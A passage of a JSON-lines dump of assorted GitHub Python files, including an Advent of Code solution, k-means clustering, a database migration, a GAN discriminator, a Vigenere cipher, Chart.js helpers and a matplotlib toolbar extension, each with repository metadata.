zero) % N][0]\n return ans\n\n\ndef main():\n with open(\"sample.txt\") as sample_file:\n sample_input = sample_file.read().strip('\\n')\n sample_answer = solve(sample_input)\n print(\"Answer for sample:\", sample_answer)\n assert sample_answer == SAMPLE_ANSWER and sample_answer is not None, f\"Got {sample_answer} instead of {SAMPLE_ANSWER}\"\n\n with open(\"input.txt\") as input_file:\n inp = input_file.read().strip('\\n')\n answer = solve(inp)\n print(\"Answer:\", answer)\n assert submit_answer(2022, 20, LEVEL, answer) is True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"qpwoeirut/competitive-programming","sub_path":"AdventOfCode/2022/day20/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"51"} +{"seq_id":"11248569870","text":"import numpy as np\nfrom numpy.linalg import norm\n\n\nclass Kmeans:\n def __init__(self,variant = None, max_iter=30, tolerance=1e-12):\n self.max_iter=max_iter\n self.variant = variant\n self.tolerance = tolerance\n \n def __calculate_centroid(self,X,Y,k):\n centroids = np.zeros(shape=(k,X.shape[1]))\n for i in range(k):\n centroids[i,:] = np.mean(X[Y==i],axis=0)\n return centroids\n\n def __kmeansplus(self,X,k):\n indices = np.random.choice(np.unique(X,axis=0).shape[0], size=1,replace=False) \n centroids = X[indices]\n labels = np.zeros(shape=(X.shape[0]))\n\n\n for i in range(k-1):\n # print(\"k:\",i)\n distance = np.zeros(shape=(X.shape[0],i+1))\n # print(centroids)\n for j in range(len(X)):\n distance[j,:] = norm(X[j,:]-centroids, axis=1)\n cluster_index = np.argmin(distance[j,:], axis=0)\n labels[j] = cluster_index\n\n cents = np.zeros(shape=X.shape)\n labels = labels.astype('int')\n cents = centroids[labels]\n max_distance = np.argmax(norm(X-cents,axis=1))\n centroids = list(centroids)\n centroids.append(X[max_distance])\n centroids = np.array(centroids)\n return centroids\n\n\n def fit(self, X, k):\n self.k = k\n self.X = X\n \n if self.variant=='kmeans++':\n print(\"Running KMeans++\")\n centroids = self.__kmeansplus(X,k)\n \n else:\n indices = np.random.choice(np.unique(X,axis=0).shape[0], size=k,replace=False)\n centroids = X[indices]\n \n distance = np.zeros(shape=(X.shape[0],k))\n labels = np.zeros(shape=(X.shape[0]))\n for i in range(self.max_iter):\n prev_centroids = centroids\n for j in range(len(X)):\n distance[j,:] = norm(X[j,:]-prev_centroids, axis=1)\n cluster_index = np.argmin(distance[j,:], axis=0)\n labels[j] = cluster_index\n centroids = self.__calculate_centroid(X,labels,k)\n if norm(prev_centroids-centroids) <= self.tolerance:\n break\n return centroids, labels\n \n \n \n \n \n \n \n \n\n \n \n \n ","repo_name":"harshit206/Clustering-Methods-Applications","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40302009024","text":"import uuid\n\n# NOC modules\nfrom noc.core.migration.base import BaseMigration\nfrom noc.core.model.fields import DocumentReferenceField\n\n\nclass Migration(BaseMigration):\n def migrate(self):\n # Select profile names\n profiles = set(\n r[0] for r in self.db.execute(\"SELECT DISTINCT profile_name FROM sa_managedobject\")\n )\n # Create profile records\n pcoll = self.mongo_db[\"noc.profiles\"]\n for p in profiles:\n u = uuid.uuid4()\n pcoll.update_many(\n {\"name\": p}, {\"$set\": {\"name\": p}, \"$setOnInsert\": {\"uuid\": u}}, upsert=True\n )\n # Get profile record mappings\n pmap = {} # name -> id\n for d in pcoll.find({}, {\"_id\": 1, \"name\": 1}):\n pmap[d[\"name\"]] = str(d[\"_id\"])\n # Create .profile field\n self.db.add_column(\n \"sa_managedobject\",\n \"profile\",\n DocumentReferenceField(\"inv.Profile\", null=True, blank=True),\n )\n # Migrate profile data\n for p in profiles:\n self.db.execute(\n \"\"\"\n UPDATE sa_managedobject\n SET profile = %s\n WHERE profile_name = %s\n \"\"\",\n [pmap[p], p],\n )\n self.db.execute(\n \"\"\"\n UPDATE sa_managedobjectselector\n SET filter_profile = %s\n WHERE filter_profile = %s\n \"\"\",\n [pmap[p], p],\n )\n # Set profile as not null\n self.db.execute(\"ALTER TABLE sa_managedobject ALTER profile SET NOT NULL\")\n # Drop legacy profile_name\n self.db.delete_column(\"sa_managedobject\", \"profile_name\")\n","repo_name":"nocproject/noc","sub_path":"sa/migrations/0150_managed_object_profile.py","file_name":"0150_managed_object_profile.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"25500682022","text":"###################\n# imports\nimport sys\nimport numpy as np\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam\n\nclass Discriminator(object):\n def __init__(self, width=28, height=28, channels=1, latent_size=100):\n #initialize variables\n self.CAPACITY = width*height*channels\n self.SHAPE = (width,height,channels)\n self.OPTIMIZER = Adam(lr=0.0002, decay=8e-9)\n self.Discriminator = self.model()\n self.Discriminator.compile(loss='binary_crossentropy', optimizer=self.OPTIMIZER, metrics=['accuracy'])\n self.Discriminator.summary()\n \n def model(self):\n # build binary classifier and return it\n model = Sequential()\n model.add(Flatten(input_shape=self.SHAPE))\n # Layer 1\n model.add(Dense(self.CAPACITY, input_shape=self.SHAPE)) #FC1\n model.add(LeakyReLU(alpha=0.2)) #FC1 Activation Function\n # Layer 2\n model.add(Dense(int(self.CAPACITY/2))) #FC2\n model.add(LeakyReLU(alpha=0.2)) #FC2 Activation Function\n # Output Layer\n model.add(Dense(1, activation='sigmoid')) # Out - probability of class or not\n \n return model\n \n def summary(self):\n # prints the model summary to the screen\n return self.Discriminator.summary()\n\n def save_model(self):\n # saves the model structure to a file in the data folder\n plot_model(self.Discriminator.model, to_file='/data/Discriminator_Model.png')\n\n\n","repo_name":"KausthubK/gan-mnist","sub_path":"discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4761503023","text":"from cs50 import get_string\nimport sys\n\n\n\"\"\"Checking for proper usage\"\"\"\n\nif len(sys.argv) != 2:\n sys.exit(\"Usage: python vigenere.py k\")\n\nif not sys.argv[1].isalpha():\n sys.exit(\"Usage: python vigenere.py k\")\n\n\nKey = sys.argv[1].lower()\n\n\n\"\"\"Building an alphabet list and a letter-->number dictionary for later\"\"\"\n\nalphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\",\n \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n\nalpha_dict = {letter: idx for idx, letter in enumerate(alphabet)}\n\nMSG = get_string(\"plaintext: \")\nITL = len(Key)\nMSG2 = \"\"\nspace = 0\n\nfor i in range(len(MSG)):\n if MSG[i] == \" \":\n space += 1\n if MSG[i].isalpha():\n if MSG[i].isupper():\n MSG2 += alphabet[(alpha_dict[MSG[i].lower()] + alpha_dict[Key[(i + space) % ITL]]) % 26].upper()\n else:\n MSG2 += alphabet[(alpha_dict[MSG[i]] + alpha_dict[Key[(i + space) % ITL]]) % 26]\n\n else:\n MSG2 += MSG[i]\n\nprint(\"ciphertext:\", MSG2)\n","repo_name":"PozzettiAndrea/CS50","sub_path":"pset6/vigenere/vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32461691939","text":"'''\nCreated on 2016/07/13\n\n@author: rondelion\n'''\nclass GoStraight(object):\n '''\n classdocs\n '''\n def action(self, input, states, parameters):\n thrust=1.0\n steering=0.0\n if input.has_key(\"velocity\") and input[\"velocity\"]>0.03:\n thrust=0.0\n states[\"steering\"]=steering\n states[\"thrust\"]=thrust\n return\n \n def getName(self):\n return \"GoStraight\"\n","repo_name":"rondelion/Lingadrome","sub_path":"Version2/src/Lingadrome/Actions/GoStraight.py","file_name":"GoStraight.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25489435206","text":"from arv_filho_esquerda_irmao_direita import ArvFilhoEsqIrmaoDir\nimport os\ndef cls():\n print(\"\\n\" * 100)\n\nprint( \"############################################################\")\nprint(\"MENU :::: ARVORE N-ARIA :::: FILHO ESQUERDA - IRMAO DIREITA \\n\")\nprint(\"CRIAR ARVORE N- ARIA\")\nprint( \"############################################################\\n\\n\")\nr = int(input(\"RAIZ :: \"))\n\nraiz = ArvFilhoEsqIrmaoDir()\nraiz.criarArvoreNaria(r)\n\ncls()\ncontrole = 9\n\nwhile(controle != 0 ):\n print( \"############################################################\")\n print(\"MENU :::: ARVORE N-ARIA :::: FILHO ESQUERDA - IRMAO DIREITA \\n\")\n print(\"1 - INSERIR NO\")\n print(\"2 - EXCLUIR NO\")\n print(\"3 - EXIBIR ARVORE \")\n print(\"4 - ESTA NA AVORE \")\n print(\"5 - LIMPAR ARVORE \")\n print(\"0 - SAIR\")\n print( \"############################################################\\n\\n\")\n\n controle = int(input(\"RESPOSTA:: \"))\n\n\n if controle == 1:\n no = int(input(\"INSERIR EM QUAL NÓ? \"))\n info = int(input(\"QUAL VALOR? \"))\n retorno = raiz.inserirArvoreNaria(no, info)\n if retorno:\n cls()\n print(\"INSERIDO COM SUCESSO!!! \\n\")\n os.system('pause')\n cls()\n else:\n cls()\n print(\"NAO EXISTE ESSE NO\")\n os.system('pause')\n cls()\n elif controle == 2:\n no = int(input(\"EXCLUIR QUAL NO? \"))\n if no == raiz.info:\n raiz.excluirNo(raiz.filhoEsq.info)\n raiz = None\n cls()\n print(\"ARVORE VAZIA!!\")\n os.system('pause')\n controle = 0\n else:\n resultado = raiz.excluirNo(no)\n if resultado:\n cls()\n print(\"EXCLUIDO COM SUCESSO!!! \\n\")\n os.system('pause')\n cls()\n else:\n cls()\n print(\"NAO FOI POSSIVEL EXCLUIR O NO\")\n os.system('pause')\n cls()\n elif controle == 3:\n cls()\n print(\"ARVORE:: \")\n resultado = raiz.exibirArvoreNaria()\n print(\"\")\n os.system('pause')\n cls()\n elif controle == 4:\n no = int(input(\"VERIFICAR QUAL NO? \"))\n resultado = raiz.existeNo(no)\n if resultado:\n print(\"NO EXISTE NA ARVORE!! \")\n else:\n print(\"NO NAO EXISTE NA ARVORE!! \")\n\n os.system('pause')\n cls()\n elif controle == 5:\n raiz.exibirArvoreNaria()\n if (raiz.filhoEsq is not None):\n resultado = raiz.excluirNo(raiz.filhoEsq.info)\n else:\n raiz = None\n resultado = True\n if resultado:\n raiz = None\n cls()\n print(\"ARVORE VAZIA!\")\n os.system('pause')\n controle = 0\nelse:\n print(\"FALOU!\")\n\n\n\n\n","repo_name":"patrickvianna/arvore-naria","sub_path":"main_filho_esquerdo_irmao_direito.py","file_name":"main_filho_esquerdo_irmao_direito.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14234440165","text":"\nimport numpy as np\n\ndef clean_dict(**kwargs):\n \"Like dict but with no None values make some values JSON serializable\"\n # XXXX this should move to jp_proxy_widgets\n result = {}\n for kw in kwargs:\n v = kwargs[kw]\n if v is not None:\n if isinstance(v, np.ndarray):\n # listiffy arrays -- maybe should be done elsewhere\n v = v.tolist()\n if isinstance(v, np.floating):\n v = float(v)\n if type(v) is tuple:\n v = list(v)\n result[kw] = v\n return result\n\ndef options(\n responsive=True,\n legend=None,\n title=None,\n animation=None,\n **other_arguments\n ):\n return clean_dict(\n responsive=responsive,\n legend=legend,\n title=title,\n animation=animation,\n **other_arguments\n )\n\ndef config(\n type,\n data,\n options=None,\n **other_arguments,\n ):\n if options is None: # noqa\n options = {} # noqa\n return clean_dict(\n type=type,\n data=data,\n options=options,\n **other_arguments,\n )\n\ndef data(\n datasets,\n labels=None,\n **other_arguments\n ):\n return clean_dict(\n datasets=datasets,\n labels=labels,\n **other_arguments\n )\n\ndef dataset(\n data,\n label=None,\n backgroundColor=None, \n **other_arguments\n ):\n return clean_dict(\n data=data,\n label=label,\n backgroundColor=backgroundColor,\n **other_arguments,\n )\n\ndef scales(\n xAxes = None,\n yAxes = None,\n **other_arguments,\n ):\n return clean_dict(\n xAxes = xAxes,\n yAxes = yAxes,\n **other_arguments,\n )\n\ndef axes(\n display = True,\n scaleLabel = None,\n stacked = False,\n **other_arguments,\n ):\n return clean_dict(\n display = display,\n scaleLabel = scaleLabel,\n stacked = stacked,\n **other_arguments,\n )\n\ncolor_name = ['aliceblue', 'antiquewhite', 'aqua', \n 'aquamarine', 'azure', 'beige', 'bisque', \n 'black', 'blanchedalmond', 'blue', 'blueviolet', \n 'brown', 'burlywood', 'cadetblue', 'chartreuse', \n 'chocolate', 'coral', 'cornflowerblue', 'cornsilk', \n 'crimson', 'cyan', 'darkblue', 'darkcyan', \n 'darkgoldenrod', 'darkgray', 'darkgreen', 'darkgrey', \n 'darkkhaki', 'darkmagenta', 'darkolivegreen', 'darkorange', \n 'darkorchid', 'darkred', 'darksalmon', 'darkseagreen', \n 'darkslateblue', 'darkslategray', 'darkslategrey', 'darkturquoise', \n 'darkviolet', 'deeppink', 'deepskyblue', 'dimgray', \n 'dimgrey', 'dodgerblue', 'firebrick', 'floralwhite', \n 'forestgreen', 'fuchsia', 'gainsboro', 'ghostwhite', \n 'gold', 'goldenrod', 'gray', 'green', 'greenyellow', \n 'grey', 'honeydew', 'hotpink', 'indianred', 'indigo', \n 'ivory', 'khaki', 'lavender', 'lavenderblush', 'lawngreen', \n 'lemonchiffon', 'lightblue', 'lightcoral', 'lightcyan', \n 'lightgoldenrodyellow', 'lightgray', 'lightgreen', \n 'lightgrey', 'lightpink', 'lightsalmon', 'lightseagreen', \n 'lightskyblue', 'lightslategray', 'lightslategrey', \n 'lightsteelblue', 'lightyellow', 'lime', 'limegreen', \n 'linen', 'magenta', 'maroon', 'mediumaquamarine', 'mediumblue', \n 'mediumorchid', 'mediumpurple', 'mediumseagreen', 'mediumslateblue', \n 'mediumspringgreen', 'mediumturquoise', 'mediumvioletred', \n 'midnightblue', 'mintcream', 'mistyrose', 'moccasin',\n 'navajowhite', 'navy', 'oldlace', 'olive', 'olivedrab', \n 'orange', 'orangered', 'orchid', 'palegoldenrod', \n 'palegreen', 'paleturquoise', 'palevioletred', 'papayawhip', \n 'peachpuff', 'peru', 'pink', 'plum', 'powderblue', \n 'purple', 'rebeccapurple', 'red', 'rosybrown', 'royalblue', \n 'saddlebrown', 'salmon', 'sandybrown', 'seagreen', \n 'seashell', 'sienna', 'silver', 'skyblue', 'slateblue',\n 'slategray', 'slategrey', 'snow', 'springgreen', \n 'steelblue', 'tan', 'teal', 'thistle', 'tomato', \n 'turquoise', 'violet', 'wheat', 'white', \n 'whitesmoke', 'yellow', 'yellowgreen'\n ]\ncolorName = {\n \"aliceblue\": [240, 248, 255],\n \"antiquewhite\": [250, 235, 215],\n \"aqua\": [0, 255, 255],\n \"aquamarine\": [127, 255, 212],\n \"azure\": [240, 255, 255],\n \"beige\": [245, 245, 220],\n \"bisque\": [255, 228, 196],\n \"black\": [0, 0, 0],\n \"blanchedalmond\": [255, 235, 205],\n \"blue\": [0, 0, 255],\n \"blueviolet\": [138, 43, 226],\n \"brown\": [165, 42, 42],\n \"burlywood\": [222, 184, 135],\n \"cadetblue\": [95, 158, 160],\n \"chartreuse\": [127, 255, 0],\n \"chocolate\": [210, 105, 30],\n \"coral\": [255, 127, 80],\n \"cornflowerblue\": [100, 149, 237],\n \"cornsilk\": [255, 248, 220],\n \"crimson\": [220, 20, 60],\n \"cyan\": [0, 255, 255],\n \"darkblue\": [0, 0, 139],\n \"darkcyan\": [0, 139, 139],\n \"darkgoldenrod\": [184, 134, 11],\n \"darkgray\": [169, 169, 169],\n \"darkgreen\": [0, 100, 0],\n \"darkgrey\": [169, 169, 169],\n \"darkkhaki\": [189, 183, 107],\n \"darkmagenta\": [139, 0, 139],\n \"darkolivegreen\": [85, 107, 47],\n \"darkorange\": [255, 140, 0],\n \"darkorchid\": [153, 50, 204],\n \"darkred\": [139, 0, 0],\n \"darksalmon\": [233, 150, 122],\n \"darkseagreen\": [143, 188, 143],\n \"darkslateblue\": [72, 61, 139],\n \"darkslategray\": [47, 79, 79],\n \"darkslategrey\": [47, 79, 79],\n \"darkturquoise\": [0, 206, 209],\n \"darkviolet\": [148, 0, 211],\n \"deeppink\": [255, 20, 147],\n \"deepskyblue\": [0, 191, 255],\n \"dimgray\": [105, 105, 105],\n \"dimgrey\": [105, 105, 105],\n \"dodgerblue\": [30, 144, 255],\n \"firebrick\": [178, 34, 34],\n \"floralwhite\": [255, 250, 240],\n \"forestgreen\": [34, 139, 34],\n \"fuchsia\": [255, 0, 255],\n \"gainsboro\": [220, 220, 220],\n \"ghostwhite\": [248, 248, 255],\n \"gold\": [255, 215, 0],\n \"goldenrod\": [218, 165, 32],\n \"gray\": [128, 128, 128],\n \"green\": [0, 128, 0],\n \"greenyellow\": [173, 255, 47],\n \"grey\": [128, 128, 128],\n \"honeydew\": [240, 255, 240],\n \"hotpink\": [255, 105, 180],\n \"indianred\": [205, 92, 92],\n \"indigo\": [75, 0, 130],\n \"ivory\": [255, 255, 240],\n \"khaki\": [240, 230, 140],\n \"lavender\": [230, 230, 250],\n \"lavenderblush\": [255, 240, 245],\n \"lawngreen\": [124, 252, 0],\n \"lemonchiffon\": [255, 250, 205],\n \"lightblue\": [173, 216, 230],\n \"lightcoral\": [240, 128, 128],\n \"lightcyan\": [224, 255, 255],\n \"lightgoldenrodyellow\": [250, 250, 210],\n \"lightgray\": [211, 211, 211],\n \"lightgreen\": [144, 238, 144],\n \"lightgrey\": [211, 211, 211],\n \"lightpink\": [255, 182, 193],\n \"lightsalmon\": [255, 160, 122],\n \"lightseagreen\": [32, 178, 170],\n \"lightskyblue\": [135, 206, 250],\n \"lightslategray\": [119, 136, 153],\n \"lightslategrey\": [119, 136, 153],\n \"lightsteelblue\": [176, 196, 222],\n \"lightyellow\": [255, 255, 224],\n \"lime\": [0, 255, 0],\n \"limegreen\": [50, 205, 50],\n \"linen\": [250, 240, 230],\n \"magenta\": [255, 0, 255],\n \"maroon\": [128, 0, 0],\n \"mediumaquamarine\": [102, 205, 170],\n \"mediumblue\": [0, 0, 205],\n \"mediumorchid\": [186, 85, 211],\n \"mediumpurple\": [147, 112, 219],\n \"mediumseagreen\": [60, 179, 113],\n \"mediumslateblue\": [123, 104, 238],\n \"mediumspringgreen\": [0, 250, 154],\n \"mediumturquoise\": [72, 209, 204],\n \"mediumvioletred\": [199, 21, 133],\n \"midnightblue\": [25, 25, 112],\n \"mintcream\": [245, 255, 250],\n \"mistyrose\": [255, 228, 225],\n \"moccasin\": [255, 228, 181],\n \"navajowhite\": [255, 222, 173],\n \"navy\": [0, 0, 128],\n \"oldlace\": [253, 245, 230],\n \"olive\": [128, 128, 0],\n \"olivedrab\": [107, 142, 35],\n \"orange\": [255, 165, 0],\n \"orangered\": [255, 69, 0],\n \"orchid\": [218, 112, 214],\n \"palegoldenrod\": [238, 232, 170],\n \"palegreen\": [152, 251, 152],\n \"paleturquoise\": [175, 238, 238],\n \"palevioletred\": [219, 112, 147],\n \"papayawhip\": [255, 239, 213],\n \"peachpuff\": [255, 218, 185],\n \"peru\": [205, 133, 63],\n \"pink\": [255, 192, 203],\n \"plum\": [221, 160, 221],\n \"powderblue\": [176, 224, 230],\n \"purple\": [128, 0, 128],\n \"rebeccapurple\": [102, 51, 153],\n \"red\": [255, 0, 0],\n \"rosybrown\": [188, 143, 143],\n \"royalblue\": [65, 105, 225],\n \"saddlebrown\": [139, 69, 19],\n \"salmon\": [250, 128, 114],\n \"sandybrown\": [244, 164, 96],\n \"seagreen\": [46, 139, 87],\n \"seashell\": [255, 245, 238],\n \"sienna\": [160, 82, 45],\n \"silver\": [192, 192, 192],\n \"skyblue\": [135, 206, 235],\n \"slateblue\": [106, 90, 205],\n \"slategray\": [112, 128, 144],\n \"slategrey\": [112, 128, 144],\n \"snow\": [255, 250, 250],\n \"springgreen\": [0, 255, 127],\n \"steelblue\": [70, 130, 180],\n \"tan\": [210, 180, 140],\n \"teal\": [0, 128, 128],\n \"thistle\": [216, 191, 216],\n \"tomato\": [255, 99, 71],\n \"turquoise\": [64, 224, 208],\n \"violet\": [238, 130, 238],\n \"wheat\": [245, 222, 179],\n \"white\": [255, 255, 255],\n \"whitesmoke\": [245, 245, 245],\n \"yellow\": [255, 255, 0],\n \"yellowgreen\": [154, 205, 50]\n }\n\ndef color_rgb(color_name, opaque=1):\n if not isinstance(color_name,str):\n raise ValueError \n color_name = color_name.lower()\n if color_name not in colorName:\n raise KeyError\n [r, g, b] = colorName[color_name]\n return 'rgb(%d, %d, %d, %f)' %(r, g, b, opaque)\n\n","repo_name":"AaronWatters/Chart_ipynb","sub_path":"chart_ipynb/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"42439967226","text":"# p642~p646\r\n# created by Jingu Kang on 01-29\r\n# reference: Fluent Python by Luciano Ramalho\r\n\r\n# more abstract python.\r\n\r\ndef cls_name(obj_or_cls):\r\n cls = type(obj_or_cls)\r\n if cls is type:\r\n cls = obj_or_cls\r\n return cls.__name__.split('.')[-1]\r\n\r\ndef display(obj):\r\n cls = type(obj)\r\n\r\n if cls is type:\r\n return ''.format(obj.__name__)\r\n elif cls in [type(None), int]:\r\n return repr(obj)\r\n else:\r\n return '<{} object>'.format(cls_name(obj))\r\n\r\ndef print_args(name, *args):\r\n pseudo_args = ', '.join(display(x) for x in args)\r\n print('-> {}.__{}__({})'.format(cls_name(args[0]), name, pseudo_args))\r\n\r\n## essential classes for this example\r\n\r\nclass Overriding:\r\n \"\"\"a.k.a data descriptor or enforced descriptor\"\"\"\r\n\r\n def __get__(self, instance, owner):\r\n print_args('get', self, instance, owner)\r\n\r\n def __set__(self, instance, value):\r\n print_args('set', self, instance, value)\r\n\r\nclass overridingNoGet:\r\n \"\"\"an overriding descriptor without __get__\"\"\"\r\n def __set__(self, instance, value):\r\n print_args('set', self, instance, value)\r\n\r\nclass NonOverriding:\r\n \"\"\"a.k.a. non-data or shadowable descriptor\"\"\"\r\n def __get__(self, instance, owner):\r\n print_args('get', self, instance, owner)\r\n\r\nclass Managed:\r\n over = Overriding()\r\n over_no_get = overridingNoGet()\r\n non_over = NonOverriding()\r\n\r\n def spam(self):\r\n print('-> managed.spam({})'.format(display(self)))\r\n\r\nobj = Managed()\r\n\r\nobj.over\r\nManaged.over\r\nprint(vars(obj))\r\n\r\nobj.over = 8\r\nobj.over\r\nManaged.over\r\n\r\nobj.__dict__['over'] = 8\r\nprint(vars(obj))\r\n\r\nprint(obj.over_no_get)\r\nprint(Managed.over_no_get)\r\nobj.over_no_get = 9\r\nprint(obj.over_no_get)\r\nobj.__dict__['over_no_get'] = 9\r\nprint(obj.over_no_get)\r\n\r\nobj.over_no_get = 99\r\nprint(obj.over_no_get) # not gonna be changed to 99\r\n\r\nobj.__dict__['over_no_get'] = 99\r\nprint(obj.over_no_get) # changed to 99\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"kibitzing/FluentPython","sub_path":"archive/To02-01/01-30/jingu_01-30.py","file_name":"jingu_01-30.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"51"} +{"seq_id":"8922782379","text":"import geopandas as gpd\nimport pandas as pd\n\n\ndef combine_geojsons(data_dict):\n result = []\n for data in ['train_geojson', 'test_geojson']:\n geo = gpd.read_file(data_dict[list(data_dict.keys())[0]]['path'] + data_dict[list(data_dict.keys())[0]][data])\n geo['name'] = list(data_dict.keys())[0]\n geo.set_index('id', inplace=True)\n for name in list(data_dict.keys())[1:]:\n if 'test_geojson' not in data_dict[name]:\n continue\n geo_i = gpd.read_file(data_dict[name]['path'] + data_dict[name][data])\n geo_i['name'] = name\n geo_i.set_index('id', inplace=True)\n geo = pd.concat([geo, geo_i])\n result.append(geo)\n return result\n\ndef main():\n data_dir = 'data'\n data_dict = {'borde_rural':\n {'path': f'{data_dir}/stac/colombia/borde_rural/',\n 'imagery': 'borde_rural_ortho-cog.tif',\n 'train_geojson': 'train-borde_rural.geojson',\n 'test_geojson': 'test-borde_rural.geojson'},\n 'borde_soacha':\n {'path': f'{data_dir}/stac/colombia/borde_soacha/',\n 'imagery': 'borde_soacha_ortho-cog.tif',\n 'train_geojson': 'train-borde_soacha.geojson',\n 'test_geojson': 'test-borde_soacha.geojson'},\n 'mixco_1_and_ebenezer':\n {'path': f'{data_dir}/stac/guatemala/mixco_1_and_ebenezer/',\n 'imagery': 'mixco_1_and_ebenezer_ortho-cog.tif',\n 'train_geojson': 'train-mixco_1_and_ebenezer.geojson',\n 'test_geojson': 'test-mixco_1_and_ebenezer.geojson'},\n 'mixco_3':\n {'path': f'{data_dir}/stac/guatemala/mixco_3/',\n 'imagery': 'mixco_3_ortho-cog.tif',\n 'train_geojson': 'train-mixco_3.geojson',\n 'test_geojson': 'test-mixco_3.geojson'},\n 'castries':\n {'path': f'{data_dir}/stac/st_lucia/castries/',\n 'imagery': 'castries_ortho-cog.tif',\n 'train_geojson': 'train-castries.geojson'},\n 'dennery':\n {'path': f'{data_dir}/stac/st_lucia/dennery/',\n 'imagery': 'dennery_ortho-cog.tif',\n 'train_geojson': 'train-dennery.geojson',\n 'test_geojson': 'test-dennery.geojson'},\n 'gros_islet':\n {'path': f'{data_dir}/stac/st_lucia/gros_islet/',\n 'imagery': 'gros_islet_ortho-cog.tif',\n 'train_geojson': 'train-gros_islet.geojson'}\n }\n\n train_geojson, test_geojson = combine_geojsons(data_dict)\n print(f'Number of train samples - {len(train_geojson)}')\n print(f'Number of test samples - {len(test_geojson)}')\n\n train_geojson.reset_index(inplace=True)\n test_geojson.reset_index(inplace=True)\n train_geojson.to_file(f'{data_dir}/train.geojson', driver='GeoJSON')\n test_geojson.to_file(f'{data_dir}/test.geojson', driver='GeoJSON')\n\n\nif __name__==\"__main__\":\n main()","repo_name":"drivendataorg/open-ai-caribbean","sub_path":"1st Place/src/data/preprocess_input_data.py","file_name":"preprocess_input_data.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"fr","doc_type":"code","stars":23,"dataset":"github-code","pt":"51"} +{"seq_id":"16423788118","text":"from .common import *\nimport matplotlib.backends.backend_qt\nfrom matplotlib.backends.qt_compat import QtGui, _enum, _devicePixelRatioF, _setDevicePixelRatio\n\n\n_OldToolbarClass = matplotlib.backends.backend_qt.NavigationToolbar2QT\n\n\nclass _NavigationToolbar2Qt(_OldToolbarClass):\n def __init__(self, canvas, parent, coordinates=True):\n super().__init__(canvas, parent, coordinates=coordinates)\n for text, tooltip_text, image_file, callback in TOOLITEMS:\n a = self.addAction(self._fb_icon(image_file), text, callback(self))\n self._actions[callback] = a\n a.setCheckable(False)\n if tooltip_text is not None:\n a.setToolTip(tooltip_text)\n\n def _fb_icon(self, name):\n \"\"\"\n Construct a `.QIcon` from an image file *name*, including the extension\n and relative to Matplotlib's \"images\" data directory.\n \"\"\"\n pm = QtGui.QPixmap(name)\n _setDevicePixelRatio(pm, _devicePixelRatioF(self))\n if self.palette().color(self.backgroundRole()).value() < 128:\n icon_color = self.palette().color(self.foregroundRole())\n mask = pm.createMaskFromColor(QtGui.QColor('black'), _enum(\"QtCore.Qt.MaskMode\").MaskOutColor)\n pm.fill(icon_color)\n pm.setMask(mask)\n return QtGui.QIcon(pm)\n\n\nmatplotlib.backends.backend_qt.NavigationToolbar2QT = _NavigationToolbar2Qt\n","repo_name":"jmishra01/Custom-button-in-Matplotlib-toolbar","sub_path":"custom_tool_button/tool_qt.py","file_name":"tool_qt.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"72101512478","text":"#!/usr/bin/env python\n# coding=utf8\n\n# Add tags folder to modules path\nimport sys\nsys.path.append('./tags')\nfrom datetime import datetime\nimport tag_creator\n\nfrom google.cloud import datastore\nimport config\n\nds = datastore.Client(project=config.PROJECT_ID)\n\ndef retrievePouches(taglist):\n ''' Get the wordPouch for a tag from Datastore; if tag does not exist\n already, it is created\n\n Args:\n taglist (list): Indicates how to build Key for tags entity\n\n Returns:\n Array of wordPouch dicts for tags entities corresponding to single snippet\n Bin contains empty dict if tag could not be created\n '''\n\n snippetPouchArray=[]\n customPouchArray=[]\n for tagStr in taglist:\n # Iterating through each tag for the snippet\n tagSplit= tagStr.split('.')\n tag_key=''\n if len(tagSplit) == 1:\n #Tag contains only parent\n tag_key= datastore.Key(\"tags\", tagSplit[0], project=config.PROJECT_ID)\n elif len(tagSplit) == 2:\n #Tag contains parent.child\n tag_key= datastore.Key(\"tags\", tagSplit[0],\"tags\", tagSplit[1], project=config.PROJECT_ID)\n else:\n raise Exception('Incorrect argument for retrieval of tag entity')\n\n tag_dict= {}\n tag_ent = ds.get(key=tag_key)\n if tag_ent is None:\n #Create tag entity\n tag_ent= tag_creator.createCustomTag(tagStr)\n\n if tag_ent is not None:\n for i,word in enumerate(tag_ent['wordPouch']):\n tag_dict[word]= tag_ent['wordPouchScores'][i]\n\n if 'CUSTOM' in str(tag_ent.key):\n customPouchArray.append(tag_dict)\n else:\n 